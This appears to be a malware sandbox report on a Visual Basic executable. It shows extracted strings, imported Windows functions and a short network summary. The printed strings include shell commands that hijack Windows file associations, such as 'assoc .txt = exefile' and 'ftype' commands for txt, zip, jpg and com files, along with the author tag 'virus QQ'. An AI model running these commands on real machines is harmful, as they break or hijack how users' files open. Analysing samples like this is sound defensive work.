j\XXSVWeE
PPuVj@YE
M/M'MO
HSVWeE
VEPEP}}}
EWEPEP+P
WVEPEP]E
MJEPEP
3EPEPj
4SVWeE
QV}}}}
QVPLuuB
EPEPEPEPEPEPj
EPEPEPEPEPEPj
E_EEPE
P]}u-EPEPEP"P"
MEPEPj
>EEEPE
Es^uS'EEEEPEP}u;EPEPEP0P0
MEPEPEPj
EEEEPEP}uEPEPEP
EEEEPEP}u1EPEPEP&P&
MEPEPEPj
EEEEPEP}u
EPEPEP
EEPEP}u
EPEPEP
EPEPEPj
EEPEP}unEPEPEPcPc
M)EPEPj
EPEPEPj
SVWeE0
MQMQ}}]V}~PPp
MQMQVPp
MQMQVPp
MQMQVPpFDMH
XSVWeE8
EP]]]]
EEj@_]E
jxX+MQM
MQMQVPpM
MQMQVPpE]E=
MQMQVPpE]E=
MQMQVPpE]E=
MQMEQE
VPOhl@
LSVWeEH
NPj@_e
f;EE~]
E\f;EE
VPPfEf
HSVWeEP
EEEEEEEEh9@
MQEMEQE
MQMQMQu
MQMQMQMQVExjE
MQMQMQM
QMQMQMQMQEVE
MQMQMQM
QMQMQMQMQVEp $]PXj
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME*
QMQMQMQMQVPX
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVPX
MQMQMQM
(QMQMQMQMQVE[]PX
MQMQMQM
,QMQMQMQMQVE\}PX
MQMQMQM
0QMQMQME"
QMQVPX
MQMQMQM
4QMQMQMQMQVEqE
MQMQMQM
8QMQMQMQMQVECy]PX
MQMQMQM
<QMQMQMQMQVE!
MQMQMQMEb%
QMQMQMQMQVP\
MQMQMQM
QMQMQMQMQVE@@E
MQMQMQM
,QMQMQMQMQVEQZ^&]P\j
MQMQMQu
MQMQMQMQVE
MQMQMQM
QMQMQMQMQVP\
MQMQMQM
(QMQMQMQMQVES
MQMQMQM
<QMQMQMQMQVE
MQMQMQM
QMQMQE}MQMQVP\
MQMQMQM
$QMQMQMQMQVE!E
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME
ZE} QMQMQMQMQVP\
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVEE
MQMQMQM
QMQMQMQMQVE
EL*}MQMQMQM
0QMQMQMQMQVP\j
MQMQMQM
QMQMQMQMQVEB9]P`
MQMQMQM
QMQMQMQMQVEqE
_MQMQMQM
,QME"am}QMQMQMQVP`
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVED
MQMQMQM
QMQMQMQMQVEKE
MQME`K}QMQM
QMQMQMQMQVP`
MQMQMQM
(QMQMQMQMQVEpE
MQMQMQM
4QMQMQMQMQVE~(]P`
MQMQMQu
MQMQMQMQVE'E
MQMQMQM
QMQMQMQMQVP`
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVE9
MQMQMQM
0QMQMQEE
MQMQVP`
MQMQMQM
<QMQMQMQMQVE|}P`
MQMQMQM
QMQMQMQMQVEeVE
MQMQMQu
MQMQMQMQVED")E
MQMQMQM
QMQMQMQMQVPd
MQMQMQM
8QMQMQMQMQVE#E
MQMQMQM
QMQMQMQMQVE9E
MQMQMQM
0QMQMQMQMQVEY[eE
QMQMQM
QMQMQMQMQVPd
MQMQMQM
(QMQMQMQMQVE}E
MQMQMQM
QMQMQMQMQVE]E
MQMQMQM
QMQMQMQMEO~oE
MQMQMQM
<QMQMQMQMQVE,E
MQMQMQM
QMQMQMQMQVE
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
MQMQMQMQVPd
MQMQMQM
,QMQMQMQMQVE5:E
MQMQMQM
QMQMQMQMQVE*E
MQMQMQM
$QMQMQMQMQVE
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
S3Wf8f
f;]]]]
QWVPlEM
QWVPlEM
QWVPlEM
QWVPlEM
SVWeE`
V3EEEE
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaStrI4
__vbaVarMove
__vbaAryMove
__vbaFreeVar
__vbaStrVarMove
__vbaLenBstr
__vbaFreeVarList
__vbaEnd
_adj_fdiv_m64
__vbaFreeObjList
_adj_fprem1
__vbaStrCat
__vbaError
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaAryDestruct
__vbaExitProc
__vbaVarForInit
__vbaObjSet
__vbaOnError
_adj_fdiv_m16i
_adj_fdivr_m16i
_CIsin
__vbaErase
__vbaChkstk
__vbaGosubFree
__vbaFileClose
EVENT_SINK_AddRef
__vbaGenerateBoundsError
__vbaAryConstruct2
__vbaPutOwner4
__vbaI2I4
DllFunctionCall
__vbaFpUI1
__vbaRedimPreserve
__vbaStrR4
_adj_fpatan
__vbaFixstrConstruct
__vbaRedim
EVENT_SINK_Release
__vbaNew
__vbaUI1I2
_CIsqrt
EVENT_SINK_QueryInterface
__vbaUI1I4
__vbaExceptHandler
__vbaPrintFile
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaGosub
__vbaFPException
__vbaGetOwner3
__vbaStrVarVal
__vbaVarCat
__vbaGetOwner4
__vbaI2Var
__vbaLsetFixstrFree
_CIlog
__vbaErrorOverflow
__vbaFileOpen
__vbaVar2Vec
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaVarSetObj
__vbaFreeStrList
__vbaDerefAry1
_adj_fdivr_m32
_adj_fdiv_r
__vbaVarTstNe
__vbaI4Var
__vbaVarAdd
__vbaAryLock
__vbaVarDup
__vbaStrToAnsi
__vbaVarLateMemCallLd
__vbaFpI4
__vbaVarCopy
__vbaVarSetObjAddref
_CIatan
__vbaStrMove
__vbaStrVarCopy
_allmul
__vbaLenVarB
_CItan
__vbaAryUnlock
__vbaFPInt
__vbaVarForNext
_CIexp
__vbaFreeStr
__vbaFreeObj
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
C:\Users\Administrator\Desktop\
2.X.pdb
49431AAD794634219A639C6C541A3D96
E8A7EA76E1854769DE340A9B8C435D05
78493ED5434848C66C6270A8C3C17E8F
96782471E1F42F0E5192DEF8D34ADF52
62A15B7205C4F5C57A85B0D3069C33A9
9FFC7CA89A523E8929336726D7773437
D3436C5275093FAF2564D1686B09A90D
E3338793698E1606AF47D324D912D726
EC9586D14581D3BBA0F9E75718021738
764B151C355885023EAC63AD4EC72A66
A7A45284C021949FCB12F82E84ADE835
E0C667944D08611BAC6BD60DA4B4BB0F
3308E37EB65C4607B66E6EEB5889FFDF
E5D714EB8CEEB6F7B4E5FD24529AD735
104EC85D1E0D2CD742D62377C0EBA714
466F56C49E765D6FCF792C14F504D5A9
87D594AA52DD916B71E104ADD235928B
386FB518756F06BA1AEBDA0B5E6EBF8C
P4WTSPh
4PPWTPh
SuPHPh
VWXTcjd_
SXP3hl
H<PVLa
H3<Q@PWTP
HX<QPWTP
HX<QPWTP
HX<QPWTP
HX<QPWTP
X<QPWT
VWXT\ajd_
H<PVLa
H3<Q@PWTP
HX<QPWT
HX<QPWTP
HX<QPWT
HX<QPWT
HX<QPWT3C@P
X<QPWT@
<8O<D0QPhM
@PqG|2F
VS^_3[]
VWEZ3X}uZ`jZ_ZTZ(IZ
((7F&F
FXXEEM_d
SVWXEX3}XWWh
S!t!xho
SW3EX\ho
T}J<;u
=((=XX=
=``n=]=MT
VXE.P3j
*9;u)E
y4XX7_[Md
VXEJ3j
#4;u)HE
3;v:9,
XPt9(
3+tSHt=Ht'Ht
?3_[Md
PQXP E
H@@<RQP
XTI@5|o
@4PDSa
@34Q@PWTH
@X4QPWTH
@X4QPWTH
@X4QPWTH
@X4QPWTH
X4QPWT
PLWTSPh
LPPWTPh
SuPHPh
tKWPhI
X6PXP$09H
vLWPhQ
XP4XP,9x
vLWPhJ
XPXP|,9
vLWPhK
XPXP(,9
vLWPhL
XP8XP,`
#tiWPhM
XPXPc
#XX#M^d
XT63SjdX]W"j
tVWXPhN
t!tVWXPhO
PTXPV|
!tOWXPhP
QTPP09Lt0WXPh[
PTXPV @]bX
t!M_^d
WXT(A4F
(v1Wjd(E
4/X}&/E
VPjdWkX
VXPjrW[X
j0d5po
VXPjdWW
VPjdWE
VXPjrW%W
j0d5po
3@M_^d
VXPjdWE
$`Y`VPhs
VXPjdWE
,j0d4W
X/)($)
V(PjdWE
j04dW
SVW33G;EE
xPPtPS|t
(&]&&X&
V(PjdSE
(R#X}D#9#
3@M_^d
W3WS S
EPuWSj
3uLPho
PjgYYj
;tc90t_Vj
VPjdS@
}*VXPjrj
j0d5po
VPjdSY?
PP}*VXPjrj
j0d5po
VPjdS&>
P}*VXPjrj
j0d5po
VPjdS<
P;})VXPjrSX<
j0d5po
+tGHt5Ht#Ht
df8hCVXPhO
+VXPhN
V(PjdWE
VPjrWN9
j045po
YY2XX!
(PXch`Q
(PXh`Q
((wXXfM_^d
df0\Ph
uijdhQ
9hv=LPPPTPXPhQ
Vjn[hQ
f04V5po
XX((|``kZI8Md
u<EPSj
UDSVWh
EEP5po
W3WuEP
E+EWPE+EPE+E
EPW5to
+V4YJ\`
+Vs;5``
3_^[;5l`
SWE30}j
f8@@f98uVW
Wd45po
X``UV`Ph
V(PjnW%
Wld5po
9,(t hR
Xb(WV(Ph
V`PjnW#
W4d5po
((JXX9(
P3Vh<L
M3Fx5Ho
VVWUYu\3A9
VVdV5po
vTl3|j
WXPjdVE
Vd5po
jqYYxMh
WPjd3VE
WXPjiV
j0d5po
W(PjdVE
ddP+@j
XXn]L((;3VVh/
;t?95o
SWPj5|o
SXPjlVE
S(PjdV3
PWdPo095
((XXMl
W3WWEE
uK\Ph`
`PWh4S
v*GGf? w f="
dGtpWq
dstpW,
W'@Pj.} =o
&39u9=o
4PjsWc
NYYShN
t7ShTN
YYShTN
t7Sh(N
YYSh(N
V4Pjd3W
FYYShN
t7ShTN
YYShTN
t7Sh(N
~YYSh(N
twf}66
t7ShTN
YYShTN
t7Sh(N
PYYSh(N
uG`P3PPh
Wdt@Pj d~
lPjfVz
fd[PM_^[w
fDV*^]
_3_^[]
URuPQT|+}
URuPQT|+}
U SVW3S
UREuTq
|P9]tKEP]
PQHE;t
dE{VdXpG
YYu#9`u
YM_^[m
PqXPWV6
W3}X(hZ
`((OXX>-
S df8o
VXWWPX>Yo
;t=PhxU
VX`WWPXXo
;t=PhHU
WWPXXo
VXWWPXlXo
;t=PhT
VXWWPX&Xo
;t=PhT
VXHWWPXWo
;t=PhT
WWPXW9ht_hxT
WWXP(GW4hDT
CdDdPWphZ
804W,E
;LtHXP
P0XPht\
8;t1XQ
PXPh`\
D;t1XQ
PXPhL\
H;t1XQ
PuXPh4\
P;Lu<;
P;Lu8;t+hD[
TD;t+h
TH;t+hZ
XET,23
40TPh^
,YYP;H
SVWXET
P0DPh^
SyYY^W3Gt
t+Ht!Ht
+t+Ht!Ht
YYhPd
PiK -f
Y|jv(T,u
WpVWis
WJ3098
RPTDHQv<Ph0s
YYhPd
VXJOuXP
7v!;hs
XX{M_^d
3SEEEA
E0EPhx
SV3;WE
WVW37(
W/YYhPd
WLVWEs
WYY3M_^d
SVW3;E
@PaPh0
YYt"7h
WSm0Xe
@Pj\y~
y3M_^d
PX4XPhx
PXyXPhx
PX$XPhx
PXiXPhx
P(lh,T
\ 3*qM_^d
E0EPh0
E0EPh0
YY^ltD`
W~VWws
WSYY3_^
PX:zXPh
PXyXPh\
dXXd$b
YYhPd
3((*`M_^d
XHTPrHPhH
PV;YYt
PVh;YYt
PV<;YYt
PX`lHXPh
V@YYh
XPVWV^h
XPViWV
X3M_^d
WXTDk3
Hu3d(hh
TYYh,T
nT``]T\
T#YYh,T
SS((SXXSM_^d
ZN48V0E
NLPVHE
NptVlE
2O@DV<E
hO(,V$E
OdhV`E
PX\VTE
|q!|^%|K=Pq
Wffffff
YY]j`h
3{FF3f
FFW](j
w\SVP9
YE;t:FHE;r
9}uX;u
E;t0FHE;r
9}u";u
EE;u`9=t
3CSVW5`
UQQSVWd5
SVWE3PPPuu
E_^[E]
USVWUj
P(RP$R
t5|$(t
;t$(v(4v
UQPXY]Y[
@@fu+E
fSt8+f
@@fu3[_]
@@fufM
HLNLHPNPP3Y`
vPVLPQE
Y3^_[]
AABBM
tJf9}tDf9Et<}
3F95xr
3MYY[]
31YY[]
SVEW3;
@u+@<v)P
UQSVW>
<"u>"u
3Y[^_5Xr
@B8\t8"u&
UQQSVW39=
W33;u.
;tuf9t
SSS+S@PWSSE;
;YEt!SSuPuWSS
uGY]]W
;rSVWEP
YYt(V5
PYF,;t
PYF4;t
PYF<;t
PYFD;t
PYFH;t
PYFT=pa
Y}F`E;t
FdE;tM
YYt+V5
3@^p3^
3]3@]h
+SVWEePEEEEd
Y_^[QVC20XC00U
33333]^]
]_^[]UL$
f;rof=p
f;r_f=Z
f;rOf=
rBPf;rAf=*
f;r1f=J
f;r!f=
3"p@d;
VDYYFu
WYYuf_]h0
PyYYtF
YYGG3f
YfdtSfitMfotGfxtAfXu
1ht lt
g~Bit!n
(j-_f;u
YtdV(PW
GGf?^u
f]t`FFf9s
jx^f;tZfXtT
S~YYj0[
ptBuf%
F$|3@_^
k3Y@_^]
W3;u4DP
MOI;|9M
WI <}}
MLD3#um
#Mj _^{
;]r;]u&
]#\D\D
FF@@u3
YYE@xE@|EpxM
EE8csmu%Ex
EPQ3VW
GuRYMHxMH|>csmu6~
tu$u u
WEPEPVu u
;EsVS;7|B;w
;Er[_^
Wcsm9>
}EPEPWu u
(u$u ]u
VYY_^[
u u$u uu
tP8csmu,9x
U$Ru u
P 3@_^]j
VW_^]M
It7ht&lt
HHtxHHtt
@@@u3@t
t-RPWS
CYCY~9PM
PvCC>Yt
j ^f;r
It6ht&lt
}]UZtg
@@@u3@t
t-RPWSH/
uH80t8
A80t.F
EVM(^[
uMSW<t
D=VP YYtG;|fE
YYM_^[@=
r$$w@
W=YEMT
tc;t_F,98uXF4;t
YYF0;t
YYv,}v<uYYF@;
PZvDRYYFP;
vP+YYV#Y_^]
3;t/A,
QoYFd^j
W>+~'WPv
7Y}3u;5@
tVPVDYY3BU y
qtb+tG
VbtFHt+
Y]3u;5@
4VYY y
GIt%t)
Gt/KuD$
GKu[^D$
VPVPV5v
@;rD3Ar
@;vAAy
YE;uo>
EtVMf9MZ
_^[j$h
33F9=lu
u2EPVh|
M3F]39}u
SVeYYE;tuWWSuu
P}YEtnu
fNPSuu
E_WEPE
UDSVWj
E3;}M]
@@Ju;t
;tD9]u?8\
EPSRWjQSv
M_^[.x
BG;U|E
EPSSSjQSv
;F(r(8_
t#F(39]
DDDDDDDDDDDDDD
;|P+;E
ue9t-j
*09)Y+
s9~(~
j YjY+
VWj Y}
PjY+3BR0H%
Yj^+3B
QP4YYu
<+3E_^[
|3@]3]
SVWj ^]
EPEPEWPv
@PEP 3;>v
|!3}MEP^
fYY3jY+N
3QQQEE
QPEPEP#
EVPM$^vh
3QQQEE
QPEPEP#
EVPdM$^.h
tAt2t$
@u+@PWV
EPVcM s
u5SSWh|
E SSSSu
]M3G9]u
YE;t}SSuuu
e33Mu;u
V?Y;thE
WreY9]t
ev$dv(dv,dv0dv4dv
dv8dv<d@v@dvDdvHdvLdvPdvTdvXdv\
dv`wdvdodvhgdvl_dvpWdvtOdvxGdv|?d@
PWcY^]
PbYv$Dk
VtbY^]UV3PPPPPPPPU
u5EP3GWh|
V`YEn}
e}UWVSM
[^_UV3PPPPPPPPU
t78t2=`
3@_^[]
PYYtbF
EEuzEE
YXS9YtJU
t1SaYP
t@ t20t$@t
/t(;t$;t
8EPuuu
uWEY>j
u|Yj4h@
u8WW3FVh|
YE;t@E
t!SS9]
u1VY9]t
E;tWWu
EPSu u
YMMjDhh
39}t WWu
tjEEb9}u
WWWWVSWu
;tG3Vj
YYE;t43WWVPVSWu
HHtjHHtF
u9S\UC\
}]39Mt
WVE;Yu
;VWEN@
vOE}SLSFEPSS6E
EMu39S
tfEM_^fC
+t5-t00
uFQ3@}
G0t1|
HHu&Mj
PQYuuO
#fEEEEEEEEEEEE?E
PEPfU}Y
EPMYu}
EPNYuO
EPoEPfEPEPEPPEM
0H;s;s
@UWVSu
F'G8t,A<
WN^xd;=g
tXSjYe
EPKYu}
u5}u,e
MuVQTYYM39U
6UWVSM
B8t6t8t't
M}M}M3~M~M~M#
M{M|@F
g~X\~`Q~F~;~(0~
~|UzpzG{LG
Tuy}`}}X}(}}G
Xt}y^}G
X}qzy|<H
X|@izH
(|Xu|j|_|XT|I|X>|3|X(|
x({{X{X{({lI
({{{p{Xe{I
(K{X@{5{I
w(]zRzJ
8zX-z"z K
z(yyy\K
yyy`y(yXyK
|y0qyfy[y(PyXEyX:y`/y$y(
y(xx`x<L
xmtXxxWtxXxxuxtX{xpx(exZxOxXDxxsltL
wwXw(wwPM
uOuX7wM
w`v(vXv
(vXwvlvN
XRvXGvN
X-v("v
q0qH&rlsr
s$Zs`sxsT#
RegCloseKey
RegSetValueExW
RegCreateKeyExW
RegEnumValueW
RegQueryInfoKeyW
RegOpenKeyExW
RegQueryValueExW
RegEnumKeyW
RegEnumKeyExW
RegDeleteKeyW
RegFlushKey
RegDeleteValueW
RegNotifyChangeKeyValue
ADVAPI32.dll
lstrlenW
EnterCriticalSection
InterlockedIncrement
LeaveCriticalSection
InterlockedDecrement
GetSystemDirectoryW
GetCurrentDirectoryW
InitializeCriticalSection
GetFileAttributesW
GetModuleFileNameW
DeleteCriticalSection
CloseHandle
HeapFree
HeapAlloc
GetProcessHeap
lstrcpyW
lstrcmpW
GetWindowsDirectoryW
CompareFileTime
lstrlenA
GetVersionExW
WaitForMultipleObjects
WaitForSingleObject
SetEvent
GetCurrentThreadId
FreeLibrary
LoadLibraryW
GetCommandLineW
CreateEventW
GetSystemInfo
GetFullPathNameW
QueryPerformanceCounter
GetTickCount
GetCurrentProcessId
GetSystemTimeAsFileTime
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetStartupInfoA
GetCommandLineA
GetVersionExA
HeapReAlloc
RtlUnwind
ExitThread
TlsSetValue
TlsGetValue
GetLastError
CreateThread
ExitProcess
GetProcAddress
GetModuleHandleA
WriteFile
GetStdHandle
GetModuleFileNameA
FreeEnvironmentStringsA
GetEnvironmentStrings
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStringsW
SetHandleCount
GetFileType
TlsFree
SetLastError
TlsAlloc
HeapDestroy
HeapCreate
VirtualFree
VirtualAlloc
IsBadWritePtr
HeapSize
LoadLibraryA
GetACP
GetOEMCP
GetCPInfo
InterlockedExchange
VirtualQuery
GetStringTypeA
GetStringTypeW
VirtualProtect
MultiByteToWideChar
IsBadReadPtr
IsBadCodePtr
SetFilePointer
LCMapStringA
LCMapStringW
GetLocaleInfoA
SetStdHandle
FlushFileBuffers
CreateFileW
SetEndOfFile
ReadFile
KERNEL32.dll
GetTextExtentPointW
GDI32.dll
EnableWindow
SendMessageW
GetDlgItem
MessageBoxW
LoadStringW
wsprintfW
EndDialog
DialogBoxParamW
GetWindowLongW
CallNextHookEx
PostMessageW
IsWindowEnabled
GetKeyState
DestroyWindow
MessageBoxA
wsprintfA
LoadStringA
SetDlgItemTextW
ShowWindow
CheckDlgButton
SetWindowTextW
ReleaseDC
SetDlgItemInt
GetDlgItemInt
GetDlgItemTextW
CheckRadioButton
LoadIconW
SetForegroundWindow
KillTimer
SetTimer
SetFocus
GetFocus
SetWindowPos
AdjustWindowRectEx
GetWindowRect
CreateDialogParamW
GetClientRect
UpdateWindow
PostQuitMessage
UnhookWindowsHookEx
SetWindowsHookExW
DispatchMessageW
TranslateMessage
IsDialogMessageW
PeekMessageW
MsgWaitForMultipleObjects
GetDesktopWindow
USER32.dll
ImageList_Destroy
ImageList_ReplaceIcon
ImageList_Create
COMCTL32.dll
GetSaveFileNameW
comdlg32.dll
ShellExecuteW
SHELL32.dll
CoInitializeSecurity
CoInitialize
CoCreateInstance
CoUninitialize
ole32.dll
OLEAUT32.dll
Ix@oGAkU'9p|B
~QCv)/&D(
uuvHMXB
9;5SM]=];Z] T7aZ%]g']
?Zd;On
7?3=Bz
;1az?aUY~S|
D?$?9'
*?}d|FU>c{
zc%C1<!8G
u7.:3q
#2IZ9W
,%I-64OSk%Y
216E0CC0CE2B89F5744D630BFDA1DBAD
B7E2F86F3BC6F19BD467E1B3C5D0C0C7
4EB232B783B92214BFC1E08897E4C5CE
BDAF1F2F8E76DA90FE5ECCF7E87F9272
8D74A6B21EB755ED409168394829C149
EB48DDE2F3183BA0F9F11FE5B745376C
E24F38EEB4C650F60F883E82B32DDC0E
80F73A217DBD93453C91B622534058EE
8890DDDCFD4EA735E4A984FCBC65E89C
0072D66A64919BB925C055617BA8394B
76A5CFADDC33EE19CF75E7D2FA59422E
8FE7B6379D2575E9367DA2C1BA0A84A4
8F958B52DFC186FC357B8D255F411150
5A1A9EAD47FEA01ED080900AE878D280
F2BAEF1D93E1B4D1E5BBFDD51FC88689
073A16E411B59ED579BDFCFC0D360F0E
4E613331083F11F4F2C5FC49673B90F4
26B61149E2AA73E99150F30D090676CA
E9557EA43BAB87BC145F6C2774A44700
A213208E21A156B14147F2D58D863BC8
B9DA5E6442C3980581ED64072E12496D
2AACCB6C0465F91C154FAF1D27C439F7
F9A84636DC6796A0A4E684DE3B719DD2
8966676B290F7C7FC2908F36BC83CFFE
E9FADB9EE15345A6701B24B38BDDA418
3824A196668610D115FE33CC0EFF140D
4EF0CE5A86FE30A9D857009CD1C88566
88AE3E3393F85E4C4AB8031A05E221A7
399037AD1F5376C302768DD75211EA31
370D1C05955BA7C071AC2929165FFE0E
CFE17FB4CFA03E11813ABFA3DBAB7F26
D90D79BF3648874CD00FBDB3226F89B2
CD4743BA20EB7192092BD9DC2BA8E82F
650168372E962E6736340575AFB0029B
3F02293E428C28766C00F16A2D8FB219
D9D36A2CB5D73EB1987D46F3F05902CD
5344CE4E6FA71F1D579FEA5314130721
222E678909CFECFEC76E2DC4367E583F
FB46E658792B89B293CE9C86EB94C8E2
2B90E5478577444B712B9B5760B752C5
133E0418BB589AA073BEAEBDEBA0EE3A
F3FDDE11D8A770261C6FFA5AC3F5F7D0
33C5A42FFDFA5FED2A3BBFEC3AEB90F4
348B9D5205791FA1B07E83D856B9D80C
4067E3EEA7B0ADF8618D8DCE6BEA9858
530EF2082A944521D11E6293D7462AB8
530EF2082A944521D11E6293D7462AB8
6FB6D306D61613FED4AD18FEE41634AA
5A75DCB6C98F0615854258F8A14DAF80
0E6D43BF684D1AFA5916FC1C9CA2D43E
0E6D43BF684D1AFA5916FC1C9CA2D43E
A2DDD82C676DC06BCDA269B8C773201A
B35E80E515E5F1D05A940EBF46DD15DF
5A15742A7F552A09389C66632DD23A38
A0A09E5E18280FD23896BBA962540CFE
6733AF623F2FE9278F650C3B30A4A862
5981C9CF8F30D7A12FFA38A942E77552
99E9BD4BB4FFEEE08F6203D741AF46D6
D06E38344C1D792675619B5DD3C5EC7B
2A859E3E9A4DCD6D8428CCACFD6FE674
E30F83E604D9FF41CCFFD119E949488D
cmd.exe
Md5_String_Calc
C:\123.bat
cmd.exe /c assoc .txt = exefile
cmd.exe /c ftype comfile=
cmd.exe /c ftype zipfile=
cmd.exe /c ftype jpgfile=
cmd.exe /c ftype txtfile=
znkzz
virus QQ 621370902
VS_VERSION_INFO
StringFileInfo
080404B0
CompanyName
FileDescription
LegalCopyright
LegalTrademarks
ProductName
FileVersion
ProductVersion
InternalName
OriginalFilename
VarFileInfo
Translation
cmd.exe
Md5_String_Calc
C:\123.bat
cmd.exe /c assoc .txt = exefile
cmd.exe /c ftype comfile=
cmd.exe /c ftype zipfile=
cmd.exe /c ftype jpgfile=
cmd.exe /c ftype txtfile=
znkzz
virus QQ 621370902
VS_VERSION_INFO
StringFileInfo
080404B0
CompanyName
FileDescription
LegalCopyright
LegalTrademarks
ProductName
FileVersion
ProductVersion
InternalName
OriginalFilename
VarFileInfo
Translation
cmd.exe
Md5_String_Calc
C:\123.bat
cmd.exe /c assoc .txt = exefile
cmd.exe /c ftype comfile=
cmd.exe /c ftype zipfile=
cmd.exe /c ftype jpgfile=
cmd.exe /c ftype txtfile=
znkzz
virus QQ 621370902
VS_VERSION_INFO
StringFileInfo
080404B0
CompanyName
FileDescription
LegalCopyright
LegalTrademarks
ProductName
FileVersion
ProductVersion
InternalName
OriginalFilename
VarFileInfo
Translation
cmd.exe
Md5_String_Calc
C:\123.bat
cmd.exe /c assoc .txt = exefile
cmd.exe /c ftype comfile=
cmd.exe /c ftype zipfile=
cmd.exe /c ftype jpgfile=
cmd.exe /c ftype txtfile=
znkzz
virus QQ 621370902
VS_VERSION_INFO
StringFileInfo
080404B0
CompanyName
FileDescription
LegalCopyright
LegalTrademarks
ProductName
FileVersion
ProductVersion
InternalName
OriginalFilename
VarFileInfo
Translation

TCP

No TCP connections recorded.

UDP

Source Source Port Destination Destination Port
192.168.56.101 53179 224.0.0.252 5355
192.168.56.101 49642 224.0.0.252 5355
192.168.56.101 137 192.168.56.255 137
192.168.56.101 61714 114.114.114.114 53
192.168.56.101 61714 8.8.8.8 53
192.168.56.101 56933 8.8.8.8 53
192.168.56.101 138 192.168.56.255 138
192.168.56.101 58485 114.114.114.114 53
192.168.56.101 57665 114.114.114.114 53

HTTP & HTTPS Requests

No HTTP requests performed.

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.